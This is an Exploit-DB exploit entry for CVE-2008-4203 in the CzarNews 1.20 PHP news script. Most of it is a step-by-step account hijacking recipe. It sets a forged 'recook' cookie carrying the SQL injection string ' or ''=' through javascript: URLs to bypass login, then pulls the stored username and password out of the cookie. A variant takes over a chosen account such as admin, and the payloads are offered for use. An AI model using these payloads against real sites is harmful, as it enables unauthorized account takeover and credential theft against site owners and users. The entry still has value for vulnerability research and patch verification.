CzarNews 1.20 - Account Hijacking SQL Injection
Author: 0ut0fbound
type: webapps
platform: php
port:
date_added: 2008-09-14
date_updated: 2016-12-23
verified: 1
codes: CVE-2008-4203;OSVDB-48720
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comCzarNewsv120.zip
czarNews Account Hijacking <= 1.20 user and password Leak
----------------------------------------------------------
Author: Maycon Maia Vitali ( 0ut0fBound )
Contact: mayconmaia at yahoo dot com dot br
http://maycon.gsec.com.br
Original Xploit by StAkeR ( http://www.milw0rm.com/exploits/6462 )
Gerenal Xploit:
---------------
1) Go to some page with CzarNews 1.20. You are in the 'Login Page'
2) Put in the URL: javascript:document.cookie="recook=' or ''=',' or
''='";void(0);
3) Refresh the page. Now you are logged in.
4) Put in the URL:
javascript:c=document.cookie;p=c.substr(c.lastIndexOf('=')+1).split(/%../);a
lert("Login: " + p[0] + "\nPass: " + p[1]);void(0);
5) With this you getted the current user and password
Attacking Especific User:
-------------------------
If you have some user that you need Xploit, You can change the step 2 by
this:
2) Put in the URL:
javascript:document.cookie="recook=[USER],'+or+''='";void(0);
Where [USER] need to be replaced with user name (e.g. admin)
enjoy,
0ut0fBound
# milw0rm.com [2008-09-15]